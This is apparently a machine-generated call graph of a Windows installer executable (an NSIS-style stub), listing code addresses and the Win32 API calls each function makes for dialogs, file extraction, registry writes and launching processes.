3210 406891 FindFirstFileW 3150->3210 3213 405fff GetFileAttributesW 3150->3213 3151->3150 3174 4055b9 3152->3174 3155 4055b9 28 API calls 3153->3155 3163 40187e 3153->3163 3155->3163 3156->3150 3160 4018c3 SetFileTime 3161 4018d5 FindCloseChangeNotification 3160->3161 3161->3163 3164 4018e6 3161->3164 3162->3150 3165 4018eb 3164->3165 3166 4018fe 3164->3166 3167 406571 21 API calls 3165->3167 3168 406571 21 API calls 3166->3168 3170 4018f3 lstrcatW 3167->3170 3171 401906 3168->3171 3169->3150 3170->3171 3172 405b94 MessageBoxIndirectW 3171->3172 3172->3163 3173->3150 3175 4055d4 3174->3175 3184 40189c 3174->3184 3176 4055f0 lstrlenW 3175->3176 3177 406571 21 API calls 3175->3177 3178 405619 3176->3178 3179 4055fe lstrlenW 3176->3179 3177->3176 3181 40562c 3178->3181 3182 40561f SetWindowTextW 3178->3182 3180 405610 lstrcatW 3179->3180 3179->3184 3180->3178 3183 405632 SendMessageW SendMessageW SendMessageW 3181->3183 3181->3184 3182->3181 3183->3184 3185 4032b9 3184->3185 3187 4032d2 3185->3187 3186 403300 3216 4034b1 3186->3216 3187->3186 3221 4034c7 SetFilePointer 3187->3221 3191 40344a 3193 40348c 3191->3193 3198 40344e 3191->3198 3192 40331d GetTickCount 3194 4018af 3192->3194 3201 403349 3192->3201 3195 4034b1 ReadFile 3193->3195 3194->3160 3194->3161 3195->3194 3196 4034b1 ReadFile 3196->3201 3197 4034b1 ReadFile 3197->3198 3198->3194 3198->3197 3199 4060d6 WriteFile 3198->3199 3199->3198 3200 40339f GetTickCount 3200->3201 3201->3194 3201->3196 3201->3200 3202 4033c4 MulDiv wsprintfW 3201->3202 3219 4060d6 WriteFile 3201->3219 3203 4055b9 28 API calls 3202->3203 3203->3201 3205->3142 3206->3143 3208 4017b4 lstrcatW 3207->3208 3209 405e1f lstrcatW 3207->3209 3208->3142 3209->3208 3211 4068b2 3210->3211 3212 4068a7 FindClose 3210->3212 3211->3150 3212->3211 3214 406011 SetFileAttributesW 3213->3214 3215 40601e 3213->3215 3214->3215 3215->3150 3222 4060a7 ReadFile 3216->3222 3220 4060f4 3219->3220 3220->3201 3221->3186 3223 40330b 3222->3223 3223->3191 3223->3192 3223->3194 3932 4014f5 SetForegroundWindow 3933 402c2f 3932->3933 3934 401a77 3935 402d89 21 API calls 3934->3935 3936 401a80 3935->3936 3937 402d89 21 API calls 3936->3937 3938 401a25 3937->3938 3939 401578 3940 401591 3939->3940 3941 401588 ShowWindow 3939->3941 3942 402c2f 3940->3942 3943 40159f ShowWindow 3940->3943 3941->3940 3943->3942 3944 4056f8 3945 4058a2 3944->3945 3946 405719 GetDlgItem GetDlgItem GetDlgItem 3944->3946 3948 4058d3 3945->3948 3949 4058ab GetDlgItem CreateThread CloseHandle 3945->3949 3989 4044e8 SendMessageW 3946->3989 3951 4058fe 3948->3951 3952 405923 3948->3952 3953 4058ea ShowWindow ShowWindow 3948->3953 3949->3948 3950 405789 3956 405790 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3950->3956 3954 40595e 3951->3954 3958 405912 3951->3958 3959 405938 ShowWindow 3951->3959 3955 40451a 8 API calls 3952->3955 3991 4044e8 SendMessageW 3953->3991 3954->3952 3965 40596c SendMessageW 3954->3965 3970 405931 3955->3970 3963 4057e2 SendMessageW SendMessageW 3956->3963 3964 4057fe 3956->3964 3992 40448c 3958->3992 3961 405958 3959->3961 3962 40594a 3959->3962 3967 40448c SendMessageW 3961->3967 3966 4055b9 28 API calls 3962->3966 3963->3964 3968 405811 3964->3968 3969 405803 SendMessageW 3964->3969 3965->3970 3971 405985 CreatePopupMenu 3965->3971 3966->3961 3967->3954 3973 4044b3 22 API calls 3968->3973 3969->3968 3972 406571 21 API calls 3971->3972 3974 405995 AppendMenuW 3972->3974 3975 405821 3973->3975 3978 4059b2 GetWindowRect 3974->3978 3979 4059c5 TrackPopupMenu 3974->3979 3976 40582a ShowWindow 3975->3976 3977 40585e GetDlgItem SendMessageW 3975->3977 3980 405840 ShowWindow 3976->3980 3981 40584d 3976->3981 3977->3970 3983 405885 SendMessageW SendMessageW 3977->3983 3978->3979 3979->3970 3982 4059e0 3979->3982 3980->3981 3990 4044e8 SendMessageW 3981->3990 3984 4059fc SendMessageW 3982->3984 3983->3970 3984->3984 3985 405a19 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3984->3985 3987 405a3e SendMessageW 3985->3987 3987->3987 3988 405a67 GlobalUnlock SetClipboardData CloseClipboard 3987->3988 3988->3970 3989->3950 3990->3977 3991->3951 3993 404493 3992->3993 3994 404499 SendMessageW 3992->3994 3993->3994 3994->3952 3995 4023f9 3996 402dab 21 API calls 3995->3996 3997 402408 3996->3997 3998 402dab 21 API calls 3997->3998 3999 402411 3998->3999 4000 402dab 21 API calls 3999->4000 4001 40241b GetPrivateProfileStringW 4000->4001 4002 404cfa 4003 404d26 4002->4003 4004 404d0a 4002->4004 4006 404d59 4003->4006 4007 404d2c SHGetPathFromIDListW 4003->4007 4013 405b78 GetDlgItemTextW 4004->4013 4009 404d43 SendMessageW 4007->4009 4010 404d3c 4007->4010 4008 404d17 SendMessageW 4008->4003 4009->4006 4011 40140b 2 API calls 4010->4011 4011->4009 4013->4008 4014 401ffb 4015 402dab 21 API calls 4014->4015 4016 402002 4015->4016 4017 406891 2 API calls 4016->4017 4018 402008 4017->4018 4020 402019 4018->4020 4021 40647b wsprintfW 4018->4021 4021->4020 4022 401b7c 4023 402dab 21 API calls 4022->4023 4024 401b83 4023->4024 4025 402d89 21 API calls 4024->4025 4026 401b8c wsprintfW 4025->4026 4027 402c2f 4026->4027 4028 401000 4029 401037 BeginPaint GetClientRect 4028->4029 4031 40100c DefWindowProcW 4028->4031 4032 4010f3 4029->4032 4033 401179 4031->4033 4034 401073 CreateBrushIndirect FillRect DeleteObject 4032->4034 4035 4010fc 4032->4035 4034->4032 4036 401102 CreateFontIndirectW 4035->4036 4037 401167 EndPaint 4035->4037 4036->4037 4038 401112 6 API calls 4036->4038 4037->4033 4038->4037 4039 401680 4040 402dab 21 API calls 4039->4040 4041 401687 4040->4041 4042 402dab 21 API calls 4041->4042 4043 401690 4042->4043 4044 402dab 21 API calls 4043->4044 4045 401699 MoveFileW 4044->4045 4046 4016a5 4045->4046 4047 4016ac 4045->4047 4049 401423 28 API calls 4046->4049 4048 406891 2 API calls 4047->4048 4051 4022fb 4047->4051 4050 4016bb 4048->4050 4049->4051 4050->4051 4052 4062f4 40 API calls 4050->4052 4052->4046 4053 401503 4054 401508 4053->4054 4056 401520 4053->4056 4055 402d89 21 API calls 4054->4055 4055->4056 4057 401a04 4058 402dab 21 API calls 4057->4058 4059 401a0b 4058->4059 4060 402dab 21 API calls 4059->4060 4061 401a14 4060->4061 4062 401a1b lstrcmpiW 4061->4062 4063 401a2d lstrcmpW 4061->4063 4064 401a21 4062->4064 4063->4064 4065 402304 4066 402dab 21 API calls 4065->4066 4067 40230a 4066->4067 4068 402dab 21 API calls 4067->4068 4069 402313 4068->4069 4070 402dab 21 API calls 4069->4070 4071 40231c 4070->4071 4072 406891 2 API calls 4071->4072 4073 402325 4072->4073 4074 402336 lstrlenW lstrlenW 4073->4074 4075 402329 4073->4075 4077 4055b9 28 API calls 4074->4077 4076 4055b9 28 API calls 4075->4076 4079 402331 4075->4079 4076->4079 4078 402374 SHFileOperationW 4077->4078 4078->4075 4078->4079 4080 401d86 4081 401d99 GetDlgItem 4080->4081 4082 401d8c 4080->4082 4083 401d93 4081->4083 4084 402d89 21 API calls 4082->4084 4085 401dda GetClientRect LoadImageW SendMessageW 4083->4085 4086 402dab 21 API calls 4083->4086 4084->4083 4088 401e38 4085->4088 4090 401e44 4085->4090 4086->4085 4089 401e3d DeleteObject 4088->4089 4088->4090 4089->4090 4091 402388 4092 4023a2 4091->4092 4093 40238f 4091->4093 4094 406571 21 API calls 4093->4094 4095 40239c 4094->4095 4096 405b94 MessageBoxIndirectW 4095->4096 4096->4092 3372 401389 3374 401390 3372->3374 3373 4013fe 3374->3373 3375 4013cb MulDiv SendMessageW 3374->3375 3375->3374 4097 402c0a SendMessageW 4098 402c24 InvalidateRect 4097->4098 4099 402c2f 4097->4099 4098->4099 3413 40350f SetErrorMode GetVersionExW 3414 403563 GetVersionExW 3413->3414 3415 40359b 3413->3415 3414->3415 3416 4035f2 3415->3416 3417 406928 5 API calls 3415->3417 3418 4068b8 3 API calls 3416->3418 3417->3416 3419 403608 lstrlenA 3418->3419 3419->3416 3420 403618 3419->3420 3421 406928 5 API calls 3420->3421 3422 40361f 3421->3422 3423 406928 5 API calls 3422->3423 3424 403626 3423->3424 3425 406928 5 API calls 3424->3425 3426 403632 #17 OleInitialize SHGetFileInfoW 3425->3426 3501 406534 lstrcpynW 3426->3501 3429 403681 GetCommandLineW 3502 406534 lstrcpynW 3429->3502 3431 403693 3432 405e30 CharNextW 3431->3432 3433 4036b9 CharNextW 3432->3433 3441 4036cb 3433->3441 3434 4037cd 3435 4037e1 GetTempPathW 3434->3435 3503 4034de 3435->3503 3437 4037f9 3438 403853 DeleteFileW 3437->3438 3439 4037fd GetWindowsDirectoryW lstrcatW 3437->3439 3513 403082 GetTickCount GetModuleFileNameW 3438->3513 3442 4034de 12 API calls 3439->3442 3440 405e30 CharNextW 3440->3441 3441->3434 3441->3440 3447 4037cf 3441->3447 3444 403819 3442->3444 3444->3438 3446 40381d GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3444->3446 3445 403867 3448 403a5a ExitProcess OleUninitialize 3445->3448 3453 40390e 3445->3453 3454 405e30 CharNextW 3445->3454 3450 4034de 12 API calls 3446->3450 3598 406534 lstrcpynW 3447->3598 3451 403a90 3448->3451 3452 403a6c 3448->3452 3458 40384b 3450->3458 3455 403b14 ExitProcess 3451->3455 3456 403a98 GetCurrentProcess OpenProcessToken 3451->3456 3459 405b94 MessageBoxIndirectW 3452->3459 3541 403c06 3453->3541 3469 403886 3454->3469 3460 403ab0 LookupPrivilegeValueW AdjustTokenPrivileges 3456->3460 3461 403ae4 3456->3461 3458->3438 3458->3448 3464 403a7a ExitProcess 3459->3464 3460->3461 3465 406928 5 API calls 3461->3465 3466 403aeb 3465->3466 3471 403b00 ExitWindowsEx 3466->3471 3474 403b0d 3466->3474 3467 4038e4 3472 405f0b 18 API calls 3467->3472 3468 403927 3470 405aff 5 API calls 3468->3470 3469->3467 3469->3468 3473 40392c lstrlenW 3470->3473 3471->3455 3471->3474 3475 4038f0 3472->3475 3601 406534 lstrcpynW 3473->3601 3606 40140b 3474->3606 3475->3448 3599 406534 lstrcpynW 3475->3599 3478 403946 3480 40395e 3478->3480 3602 406534 lstrcpynW 3478->3602 3484 403984 wsprintfW 3480->3484 3488 4039b0 3480->3488 3481 403903 3600 406534 lstrcpynW 3481->3600 3485 406571 21 API calls 3484->3485 3485->3480 3486 405a88 2 API calls 3486->3488 3487 405ae2 2 API calls 3487->3488 3488->3480 3488->3484 3488->3486 3488->3487 3489 4039c0 GetFileAttributesW 3488->3489 3490 4039fa SetCurrentDirectoryW 3488->3490 3494 405c40 71 API calls 3488->3494 3495 4039f8 3488->3495 3496 4062f4 40 API calls 3488->3496 3497 406571 21 API calls 3488->3497 3499 403a82 CloseHandle 3488->3499 3500 406891 2 API calls 3488->3500 3603 405b17 CreateProcessW 3488->3603 3489->3488 3491 4039cc DeleteFileW 3489->3491 3492 4062f4 40 API calls 3490->3492 3491->3488 3493 403a09 CopyFileW 3492->3493 3493->3488 3493->3495 3494->3488 3495->3448 3496->3488 3497->3488 3499->3495 3500->3488 3501->3429 3502->3431 3504 4067e2 5 API calls 3503->3504 3506 4034ea 3504->3506 3505 4034f4 3505->3437 3506->3505 3507 405e03 3 API calls 3506->3507 3508 4034fc 3507->3508 3509 405ae2 2 API calls 3508->3509 3510 403502 3509->3510 3511 406053 2 API calls 3510->3511 3512 40350d 3511->3512 3512->3437 3609 406024 GetFileAttributesW CreateFileW 3513->3609 3515 4030c2 3533 4030d2 3515->3533 3610 406534 lstrcpynW 3515->3610 3517 4030e8 3518 405e4f 2 API calls 3517->3518 3519 4030ee 3518->3519 3611 406534 lstrcpynW 3519->3611 3521 4030f9 GetFileSize 3522 4031f3 3521->3522 3535 403110 3521->3535 3612 40301e 3522->3612 3524 4031fc 3526 40322c GlobalAlloc 3524->3526 3524->3533 3624 4034c7 SetFilePointer 3524->3624 3525 4034b1 ReadFile 3525->3535 3623 4034c7 SetFilePointer 3526->3623 3528 40325f 3532 40301e 6 API calls 3528->3532 3530 403215 3534 4034b1 ReadFile 3530->3534 3531 403247 3536 4032b9 35 API calls 3531->3536 3532->3533 3533->3445 3537 403220 3534->3537 3535->3522 3535->3525 3535->3528 3535->3533 3538 40301e 6 API calls 3535->3538 3539 403253 3536->3539 3537->3526 3537->3533 3538->3535 3539->3533 3539->3539 3540 403290 SetFilePointer 3539->3540 3540->3533 3542 406928 5 API calls 3541->3542 3543 403c1a 3542->3543 3544 403c20 GetUserDefaultUILanguage 3543->3544 3545 403c32 3543->3545 3629 40647b wsprintfW 3544->3629 3547 406402 3 API calls 3545->3547 3549 403c62 3547->3549 3548 403c30 3630 403edc 3548->3630 3550 403c81 lstrcatW 3549->3550 3551 406402 3 API calls 3549->3551 3550->3548 3551->3550 3554 405f0b 18 API calls 3555 403cb3 3554->3555 3556 403d47 3555->3556 3558 406402 3 API calls 3555->3558 3557 405f0b 18 API calls 3556->3557 3559 403d4d 3557->3559 3560 403ce5 3558->3560 3561 403d5d LoadImageW 3559->3561 3562 406571 21 API calls 3559->3562 3560->3556 3565 403d06 lstrlenW 3560->3565 3569 405e30 CharNextW 3560->3569 3563 403e03 3561->3563 3564 403d84 RegisterClassW 3561->3564 3562->3561 3568 40140b 2 API calls 3563->3568 3566 40391e 3564->3566 3567 403dba SystemParametersInfoW CreateWindowExW 3564->3567 3570 403d14 lstrcmpiW 3565->3570 3571 403d3a 3565->3571 3566->3448 3567->3563 3572 403e09 3568->3572 3573 403d03 3569->3573 3570->3571 3574 403d24 GetFileAttributesW 3570->3574 3575 405e03 3 API calls 3571->3575 3572->3566 3577 403edc 22 API calls 3572->3577 3573->3565 3576 403d30 3574->3576 3578 403d40 3575->3578 3576->3571 3579 405e4f 2 API calls 3576->3579 3580 403e1a 3577->3580 3638 406534 lstrcpynW 3578->3638 3579->3571 3582 403e26 ShowWindow 3580->3582 3583 403ea9 3580->3583 3584 4068b8 3 API calls 3582->3584 3639 40568c OleInitialize 3583->3639 3586 403e3e 3584->3586 3588 403e4c GetClassInfoW 3586->3588 3591 4068b8 3 API calls 3586->3591 3587 403eaf 3589 403eb3 3587->3589 3590 403ecb 3587->3590 3593 403e60 GetClassInfoW RegisterClassW 3588->3593 3594 403e76 DialogBoxParamW 3588->3594 3589->3566 3595 40140b 2 API calls 3589->3595 3592 40140b 2 API calls 3590->3592 3591->3588 3592->3566 3593->3594 3596 40140b 2 API calls 3594->3596 3595->3566 3597 403e9e 3596->3597 3597->3566 3598->3435 3599->3481 3600->3453 3601->3478 3602->3480 3604 405b56 3603->3604 3605 405b4a CloseHandle 3603->3605 3604->3488 3605->3604 3607 401389 2 API calls 3606->3607 3608 401420 3607->3608 3608->3455 3609->3515 3610->3517 3611->3521 3613 403027 3612->3613 3614 40303f 3612->3614 3615 403030 DestroyWindow 3613->3615 3616 403037 3613->3616 3617 403047 3614->3617 3618 40304f GetTickCount 3614->3618 3615->3616 3616->3524 3625 406964 3617->3625 3620 403080 3618->3620 3621 40305d CreateDialogParamW ShowWindow 3618->3621 3620->3524 3621->3620 3623->3531 3624->3530 3626 406981 PeekMessageW 3625->3626 3627 40304d 3626->3627 3628 406977 DispatchMessageW 3626->3628 3627->3524 3628->3626 3629->3548 3631 403ef0 3630->3631 3646 40647b wsprintfW 3631->3646 3633 403f61 3647 403f95 3633->3647 3635 403c91 3635->3554 3636 403f66 3636->3635 3637 406571 21 API calls 3636->3637 3637->3636 3638->3556 3650 4044ff 3639->3650 3641 4056d6 3642 4044ff SendMessageW 3641->3642 3644 4056e8 OleUninitialize 3642->3644 3643 4056af 3643->3641 3653 401389 3643->3653 3644->3587 3646->3633 3648 406571 21 API calls 3647->3648 3649 403fa3 SetWindowTextW 3648->3649 3649->3636 3651 404517 3650->3651 3652 404508 SendMessageW 3650->3652 3651->3643 3652->3651 3655 401390 3653->3655 3654 4013fe 3654->3643 3655->3654 3656 4013cb MulDiv SendMessageW 3655->3656 3656->3655 4100 40248f 4101 402dab 21 API calls 4100->4101 4102 4024a1 4101->4102 4103 402dab 21 API calls 4102->4103 4104 4024ab 4103->4104 4117 402e3b 4104->4117 4107 402933 4108 4024e3 4110 4024ef 4108->4110 4113 402d89 21 API calls 4108->4113 4109 402dab 21 API calls 4112 4024d9 lstrlenW 4109->4112 4111 40250e RegSetValueExW 4110->4111 4114 4032b9 35 API calls 4110->4114 4115 402524 RegCloseKey 4111->4115 4112->4108 4113->4110 4114->4111 4115->4107 4118 402e56 4117->4118 4121 4063cf 4118->4121 4122 4063de 4121->4122 4123 4024bb 4122->4123 4124 4063e9 RegCreateKeyExW 4122->4124 4123->4107 4123->4108 4123->4109 4124->4123 4125 402910 4126 402dab 21 API calls 4125->4126 4127 402917 FindFirstFileW 4126->4127 4128 40293f 4127->4128 4131 40292a 4127->4131 4133 40647b wsprintfW 4128->4133 4130 402948 4134 406534 lstrcpynW 4130->4134 4133->4130 4134->4131 4135 401911 4136 401948 4135->4136 4137 402dab 21 API calls 4136->4137 4138 40194d 4137->4138 4139 405c40 71 API calls 4138->4139 4140 401956 4139->4140 4141 401491 4142 4055b9 28 API calls 4141->4142 4143 401498 4142->4143 4144 401914 4145 402dab 21 API calls 4144->4145 4146 40191b 4145->4146 4147 405b94 MessageBoxIndirectW 4146->4147 4148 401924 4147->4148 4149 402896 4150 40289d 4149->4150 4151 402bae 4149->4151 4152 402d89 21 API calls 4150->4152 4153 4028a4 4152->4153 4154 4028b3 SetFilePointer 4153->4154 4154->4151 4155 4028c3 4154->4155 4157 40647b wsprintfW 4155->4157 4157->4151 4158 401f17 4159 402dab 21 API calls 4158->4159 4160 401f1d 4159->4160 4161 402dab 21 API calls 4160->4161 4162 401f26 4161->4162 4163 402dab 21 API calls 4162->4163 4164 401f2f 4163->4164 4165 402dab 21 API calls 4164->4165 4166 401f38 4165->4166 4167 401423 28 API calls 4166->4167 4168 401f3f 4167->4168 4175 405b5a ShellExecuteExW 4168->4175 4170 401f87 4172 402933 4170->4172 4176 4069d3 WaitForSingleObject 4170->4176 4173 401fa4 CloseHandle 4173->4172 4175->4170 4177 4069ed 4176->4177 4178 4069ff GetExitCodeProcess 4177->4178 4179 406964 2 API calls 4177->4179 4178->4173 4180 4069f4 WaitForSingleObject 4179->4180 4180->4177 4181 402f98 4182 402fc3 4181->4182 4183 402faa SetTimer 4181->4183 4184 403018 4182->4184 4185 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4182->4185 4183->4182 4185->4184 4186 401d1c 4187 402d89 21 API calls 4186->4187 4188 401d22 IsWindow 4187->4188 4189 401a25 4188->4189 4190 40149e 4191 4023a2 4190->4191 4192 4014ac PostQuitMessage 4190->4192 4192->4191 3041 401ba0 3042 401bf1 3041->3042 3043 401bad 3041->3043 3044 401bf6 3042->3044 3045 401c1b GlobalAlloc 3042->3045 3046 401c36 3043->3046 3051 401bc4 3043->3051 3059 4023a2 3044->3059 3079 406534 lstrcpynW 3044->3079 3060 406571 3045->3060 3047 406571 21 API calls 3046->3047 3046->3059 3049 40239c 3047->3049 3080 405b94 3049->3080 3077 406534 lstrcpynW 3051->3077 3052 401c08 GlobalFree 3052->3059 3054 401bd3 3078 406534 lstrcpynW 3054->3078 3057 401be2 3084 406534 lstrcpynW 3057->3084 3075 40657c 3060->3075 3061 4067c3 3062 4067dc 3061->3062 3107 406534 lstrcpynW 3061->3107 3062->3046 3064 406794 lstrlenW 3064->3075 3065 406571 15 API calls 3065->3064 3069 40668d GetSystemDirectoryW 3069->3075 3070 4066a3 GetWindowsDirectoryW 3070->3075 3071 406735 lstrcatW 3071->3075 3073 406571 15 API calls 3073->3075 3075->3061 3075->3064 3075->3065 3075->3069 3075->3070 3075->3071 3075->3073 3076 406705 SHGetPathFromIDListW CoTaskMemFree 3075->3076 3085 406402 3075->3085 3090 406928 GetModuleHandleA 3075->3090 3096 4067e2 3075->3096 3105 40647b wsprintfW 3075->3105 3106 406534 lstrcpynW 3075->3106 3076->3075 3077->3054 3078->3057 3079->3052 3081 405ba9 3080->3081 3082 405bf5 3081->3082 3083 405bbd MessageBoxIndirectW 3081->3083 3082->3059 3083->3082 3084->3059 3108 4063a1 3085->3108 3088 406436 RegQueryValueExW RegCloseKey 3089 406466 3088->3089 3089->3075 3091 406944 3090->3091 3092 40694e GetProcAddress 3090->3092 3112 4068b8 GetSystemDirectoryW 3091->3112 3094 40695d 3092->3094 3094->3075 3095 40694a 3095->3092 3095->3094 3102 4067ef 3096->3102 3097 40686a CharPrevW 3098 406865 3097->3098 3098->3097 3100 40688b 3098->3100 3099 406858 CharNextW 3099->3098 3099->3102 3100->3075 3102->3098 3102->3099 3103 406844 CharNextW 3102->3103 3104 406853 CharNextW 3102->3104 3115 405e30 3102->3115 3103->3102 3104->3099 3105->3075 3106->3075 3107->3062 3109 4063b0 3108->3109 3110 4063b4 3109->3110 3111 4063b9 RegOpenKeyExW 3109->3111 3110->3088 3110->3089 3111->3110 3113 4068da wsprintfW LoadLibraryExW 3112->3113 3113->3095 3116 405e36 3115->3116 3117 405e4c 3116->3117 3118 405e3d CharNextW 3116->3118 3117->3102 3118->3116 4193 404f20 GetDlgItem GetDlgItem 4194 404f72 7 API calls 4193->4194 4200 405197 4193->4200 4195 405019 DeleteObject 4194->4195 4196 40500c SendMessageW 4194->4196 4197 405022 4195->4197 4196->4195 4199 405059 4197->4199 4201 406571 21 API calls 4197->4201 4198 405279 4203 405325 4198->4203 4208 40518a 4198->4208 4213 4052d2 SendMessageW 4198->4213 4202 4044b3 22 API calls 4199->4202 4200->4198 4227 405206 4200->4227 4247 404e6e SendMessageW 4200->4247 4206 40503b SendMessageW SendMessageW 4201->4206 4207 40506d 4202->4207 4204 405337 4203->4204 4205 40532f SendMessageW 4203->4205 4215 405350 4204->4215 4216 405349 ImageList_Destroy 4204->4216 4224 405360 4204->4224 4205->4204 4206->4197 4212 4044b3 22 API calls 4207->4212 4210 40451a 8 API calls 4208->4210 4209 40526b SendMessageW 4209->4198 4214 405526 4210->4214 4228 40507e 4212->4228 4213->4208 4218 4052e7 SendMessageW 4213->4218 4219 405359 GlobalFree 4215->4219 4215->4224 4216->4215 4217 4054da 4217->4208 4222 4054ec ShowWindow GetDlgItem ShowWindow 4217->4222 4221 4052fa 4218->4221 4219->4224 4220 405159 GetWindowLongW SetWindowLongW 4223 405172 4220->4223 4229 40530b SendMessageW 4221->4229 4222->4208 4225 405177 ShowWindow 4223->4225 4226 40518f 4223->4226 4224->4217 4238 40539b 4224->4238 4252 404eee 4224->4252 4245 4044e8 SendMessageW 4225->4245 4246 4044e8 SendMessageW 4226->4246 4227->4198 4227->4209 4228->4220 4230 405154 4228->4230 4234 4050d1 SendMessageW 4228->4234 4235 405123 SendMessageW 4228->4235 4236 40510f SendMessageW 4228->4236 4229->4203 4230->4220 4230->4223 4231 4053df 4239 4054a5 4231->4239 4244 405453 SendMessageW SendMessageW 4231->4244 4234->4228 4235->4228 4236->4228 4238->4231 4242 4053c9 SendMessageW 4238->4242 4240 4054b0 InvalidateRect 4239->4240 4241 4054bc 4239->4241 4240->4241 4241->4217 4261 404e29 4241->4261 4242->4231 4244->4231 4245->4208 4246->4200 4248 404e91 GetMessagePos ScreenToClient SendMessageW 4247->4248 4249 404ecd SendMessageW 4247->4249 4250 404ec5 4248->4250 4251 404eca 4248->4251 4249->4250 4250->4227 4251->4249 4264 406534 lstrcpynW 4252->4264 4254 404f01 4265 40647b wsprintfW 4254->4265 4256 404f0b 4257 40140b 2 API calls 4256->4257 4258 404f14 4257->4258 4266 406534 lstrcpynW 4258->4266 4260 404f1b 4260->4238 4267 404d60 4261->4267 4263 404e3e 4263->4217 4264->4254 4265->4256 4266->4260 4268 404d79 4267->4268 4269 406571 21 API calls 4268->4269 4270 404ddd 4269->4270 4271 406571 21 API calls 4270->4271 4272 404de8 4271->4272 4273 406571 21 API calls 4272->4273 4274 404dfe lstrlenW wsprintfW SetDlgItemTextW 4273->4274 4274->4263 4275 402621 4276 402dab 21 API calls 4275->4276 4277 402628 4276->4277 4280 406024 GetFileAttributesW CreateFileW 4277->4280 4279 402634 4280->4279 4281 404623 lstrlenW 4282 404642 4281->4282 4283 404644 WideCharToMultiByte 4281->4283 4282->4283 4284 4025a3 4294 402deb 4284->4294 4287 402d89 21 API calls 4288 4025b6 4287->4288 4289 4025d2 RegEnumKeyW 4288->4289 4290 4025de RegEnumValueW 4288->4290 4292 402933 4288->4292 4291 4025f3 RegCloseKey 4289->4291 4290->4291 4291->4292 4295 402dab 21 API calls 4294->4295 4296 402e02 4295->4296 4297 4063a1 RegOpenKeyExW 4296->4297 4298 4025ad 4297->4298 4298->4287 4299 4049a4 4300 4049d0 4299->4300 4301 4049e1 4299->4301 4360 405b78 GetDlgItemTextW 4300->4360 4302 4049ed GetDlgItem 4301->4302 4309 404a4c 4301->4309 4304 404a01 4302->4304 4308 404a15 SetWindowTextW 4304->4308 4313 405eae 4 API calls 4304->4313 4305 404b30 4310 404cdf 4305->4310 4362 405b78 GetDlgItemTextW 4305->4362 4306 4049db 4307 4067e2 5 API calls 4306->4307 4307->4301 4314 4044b3 22 API calls 4308->4314 4309->4305 4309->4310 4315 406571 21 API calls 4309->4315 4312 40451a 8 API calls 4310->4312 4317 404cf3 4312->4317 4318 404a0b 4313->4318 4319 404a31 4314->4319 4320 404ac0 SHBrowseForFolderW 4315->4320 4316 404b60 4321 405f0b 18 API calls 4316->4321 4318->4308 4325 405e03 3 API calls 4318->4325 4322 4044b3 22 API calls 4319->4322 4320->4305 4323 404ad8 CoTaskMemFree 4320->4323 4324 404b66 4321->4324 4326 404a3f 4322->4326 4327 405e03 3 API calls 4323->4327 4363 406534 lstrcpynW 4324->4363 4325->4308 4361 4044e8 SendMessageW 4326->4361 4330 404ae5 4327->4330 4332 404b1c SetDlgItemTextW 4330->4332 4336 406571 21 API calls 4330->4336 4331 404a45 4334 406928 5 API calls 4331->4334 4332->4305 4333 404b7d 4335 406928 5 API calls 4333->4335 4334->4309 4343 404b84 4335->4343 4337 404b04 lstrcmpiW 4336->4337 4337->4332 4339 404b15 lstrcatW 4337->4339 4338 404bc5 4364 406534 lstrcpynW 4338->4364 4339->4332 4341 404bcc 4342 405eae 4 API calls 4341->4342 4344 404bd2 GetDiskFreeSpaceW 4342->4344 4343->4338 4347 405e4f 2 API calls 4343->4347 4348 404c1d 4343->4348 4346 404bf6 MulDiv 4344->4346 4344->4348 4346->4348 4347->4343 4349 404c8e 4348->4349 4350 404e29 24 API calls 4348->4350 4351 404cb1 4349->4351 4353 40140b 2 API calls 4349->4353 4352 404c7b 4350->4352 4365 4044d5 EnableWindow 4351->4365 4354 404c90 SetDlgItemTextW 4352->4354 4355 404c80 4352->4355 4353->4351 4354->4349 4357 404d60 24 API calls 4355->4357 4357->4349 4358 404ccd 4358->4310 4359 4048fd SendMessageW 4358->4359 4359->4310 4360->4306 4361->4331 4362->4316 4363->4333 4364->4341 4365->4358 4366 4015a8 4367 402dab 21 API calls 4366->4367 4368 4015af SetFileAttributesW 4367->4368 4369 4015c1 4368->4369 4370 401fa9 4371 402dab 21 API calls 4370->4371 4372 401faf 4371->4372 4373 4055b9 28 API calls 4372->4373 4374 401fb9 4373->4374 4375 405b17 2 API calls 4374->4375 4376 401fbf 4375->4376 4377 401fe2 CloseHandle 4376->4377 4379 4069d3 5 API calls 4376->4379 4381 402933 4376->4381 4377->4381 4380 401fd4 4379->4380 4380->4377 4383 40647b wsprintfW 4380->4383 4383->4377 3376 403b2c 3377 403b44 3376->3377 3378 403b36 CloseHandle 3376->3378 3383 403b71 3377->3383 3378->3377 3381 405c40 71 API calls 3382 403b55 3381->3382 3384 403b7f 3383->3384 3385 403b49 3384->3385 3386 403b84 FreeLibrary GlobalFree 3384->3386 3385->3381 3386->3385 3386->3386 4384 40552d 4385 405551 4384->4385 4386 40553d 4384->4386 4387 405559 IsWindowVisible 4385->4387 4390 405570 4385->4390 4388 405543 4386->4388 4396 40559a 4386->4396 4389 405566 4387->4389 4387->4396 4392 4044ff SendMessageW 4388->4392 4393 404e6e 5 API calls 4389->4393 4391 40559f CallWindowProcW 4390->4391 4395 404eee 4 API calls 4390->4395 4394 40554d 4391->4394 4392->4394 4393->4390 4395->4396 4396->4391 4397 40202f 4398 402dab 21 API calls 4397->4398 4399 402036 4398->4399 4400 406928 5 API calls 4399->4400 4401 402045 4400->4401 4402 402061 GlobalAlloc 4401->4402 4403 4020d1 4401->4403 4402->4403 4404 402075 4402->4404 4405 406928 5 API calls 4404->4405 4406 40207c 4405->4406 4407 406928 5 API calls 4406->4407 4408 402086 4407->4408 4408->4403 4412 40647b wsprintfW 4408->4412 4410 4020bf 4413 40647b wsprintfW 4410->4413 4412->4410 4413->4403 4414 40252f 4415 402deb 21 API calls 4414->4415 4416 402539 4415->4416 4417 402dab 21 API calls 4416->4417 4418 402542 4417->4418 4419 40254d RegQueryValueExW 4418->4419 4423 402933 4418->4423 4420 402573 RegCloseKey 4419->4420 4421 40256d 4419->4421 4420->4423 4421->4420 4425 40647b wsprintfW 4421->4425 4425->4420 4426 4021af 4427 402dab 21 API calls 4426->4427 4428 4021b6 4427->4428 4429 402dab 21 API calls 4428->4429 